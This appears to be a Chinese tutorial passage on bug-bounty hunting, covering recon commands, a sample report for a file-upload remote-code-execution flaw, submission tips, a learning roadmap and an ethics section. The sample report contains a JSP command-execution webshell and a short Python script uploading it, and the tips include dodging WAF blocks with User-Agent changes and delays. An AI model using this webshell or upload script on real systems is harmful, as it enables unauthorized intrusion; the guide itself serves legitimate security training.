SRC漏洞挖掘技巧分享：从零基础到实战精通，助你踏上白帽黑客之路

[信息收集] → [目标识别] → [漏洞复现] → [POC编写] → [提交SRC]

# 示例命令：使用Amass枚举目标子域名
amass enum -d example.com -o subdomains.txt

nuclei -u https://target.com -t ~/nuclei-templates/http/sensitive-files.yaml -v

## 漏洞标题
XX系统文件上传绕过导致RCE（远程代码执行）

## 漏洞类型
高危 - 文件上传黑名单绕过

## 影响范围
所有启用上传功能的模块

## 复现步骤
1. 访问 https://target.com/upload.php
2. 上传 .jsp 文件（内容：<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>）
3. 返回路径为 /uploads/shell.jsp
4. 访问该URL并传参 ?cmd=whoami，成功执行系统命令

## POC代码
```python
import requests
files = {'file': ('shell.jsp', '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>')}
res = requests.post('https://target.com/upload.php', files=files)
print(res.text)

> ✅ **注意事项**：
> - 不要附带恶意载荷（如一句话木马）
> - 提供Burp抓包截图或HTTP请求/响应原文
> - 使用统一命名格式：`2025-10-27-文件上传-RCE-target.com`

---

### 第五步：提交SRC平台 —— 成功的关键细节

- ✅ 提交前本地复现至少3次，确保稳定性
- ✅ 检查是否重复（查看历史报告）
- ✅ 避免扫描器全量扫描，防止触发封禁
- ✅ 如遇WAF拦截，尝试更换User-Agent或添加随机延迟

---

## 三、新手成长路线图：从入门到精通

| 阶段 | 学习内容 | 时间建议 | 推荐资源 |
|------|----------|---------|----------|
| 入门基础 | Web安全概念（SQLi、XSS、CSRF） | 1-2周 | CSDN、FreeBuf、i春秋 |
| 环境搭建 | Kali Linux、Burp Suite、SQLMap | 3-4周 | 官方文档、B站教程 |
| 实战演练 | DVWA、sqli-labs、Upload-labs | 6周 | GitHub开源靶场 |
| 编程能力 | Python基础（爬虫、多线程、正则） | 8周 | w3cschool、廖雪峰Python教程 |
| 代码审计 | PHP/Java常见漏洞函数分析 | 4-6周 | 乌云镜像、Sebug |
| 持续学习 | 关注CNVD、CVE公告、安全博客 | 长期 | 安全客、Seebug Paper |

---

## 四、合规与伦理：白帽黑客的底线

- ✅ **仅测试授权范围内的系统**
- ✅ **不进行DDoS、数据删除等破坏性操作**
- ✅ **不泄露未修复漏洞信息**
- ✅ **遵守各SRC平台的《漏洞提交规范》**

> ⚖️ 特别提醒：未经授权的渗透测试属于违法行为，请务必通过正规渠道参与SRC项目。

---

## 五、坚持是挖洞最大的天赋

SRC挖洞并非一蹴而就，初期可能连续数周无收获，甚至提交的漏洞被标记为“低危”或“重复”。但正如一位资深白帽所说：“**每一个高危漏洞的背后，都是上百个低危漏洞积累的经验。**”

只要你保持耐心、持续学习、善于总结，终将在SRC平台上收获属于你的第一笔赏金，开启通往网络安全高手的成长之路！